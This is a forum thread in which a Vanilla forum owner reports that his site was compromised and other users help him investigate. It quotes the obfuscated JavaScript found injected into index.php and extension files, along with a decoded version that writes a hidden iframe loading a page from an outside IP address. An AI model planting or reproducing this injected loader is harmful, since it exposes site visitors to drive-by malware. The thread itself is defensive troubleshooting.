OMFG HAxX! possible XSS hole?

davatron5000

i know i've said i was hacked before, but i think this time it's legit. today my forum was took down by a militant javascript. i uploaded Vanilla 1.1.3 yesterday and had no problems. even solved some of my previous ones. but today my forum displayed blank. and when i viewed source i found this script repeated about 10+ times.

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27 %44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28 %27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%62%38%61%36%63%64 %65%38%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32 %39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e %70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68 %2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%36%32%35%29%2b%27%39%63 %39%63%61%5c%27%20%77%69%64%74%68%3d%33%37%35%20%68%65%69%67%68 %74%3d%35%37%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79 %3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

i looked around in almost all the files on my server and found this script appended to my /index.php and almost all of my /extensions/*/default.php

my forum doesn't allow non-members to post, so is it a registration hole? a postbackaction hole? i'm pretty sure all of my permissions are set right. but i did have to set Nuggets to 777 to get it to write. that could have been the hole as well. any help and/or a possible fix would be great.

Dinoboff

Here what it does.
"window.status='Done'; document.write('<iframe name=ab8a6cde8c src=\'http://81.29.241.70/new/counter.php?' +Math.round(Math.random()*215625)+'9c9ca\' width=375 height=575 style=\'display: none\'></iframe>')"
I don't think it's a xss. The code is injected in your source files.

You should let your host know about that.

davatron5000

i went through and hand deleted all the occurrences of the script and got my forum back online. the only irregularity is that in Quotations(1.6)/default.php the script was injected before the php close "?>". it seems to have replaced the close with the script. and that's why the forum went blank.

on a sidenote. does anyone here know how to hack (like 1337 h4x0r hack)? i'd like to learn so i can run my development sites through a bit of hard testing. use those powers for good and not for evil.

Vaz

... see the following.

Dinoboff

Here is an example with Joomla:
http://security.immerda.ch/?p=11

The cracker find a way to upload a malicious file on your server and to execute it.

davatron5000

i went through and deleted all the instances. in the source. made sure all my directories were the right permissions. but the script is back. in my /extensions/*/default.php and in my /index.php. how are they doing this?

Dinoboff

Do you have an other application on your server? I doubt the vulnerability is from vanilla.
Did you change you different password?
Did you contact your host? Your control panel or an other user on your server could have the vulnerability.

davatron5000

i have movable type on my system. but no problems there. this only shows up on my site on this server in my vanilla installation.

Dinoboff

It seems to target every index.* or default.* files. Are you sure, it didn't corrupt any movable type file like index.html?

Which application allow you to upload a file on the server?
(Also check that allow_url_fopen and register_globals php settings are not both on).

Did you contact your host?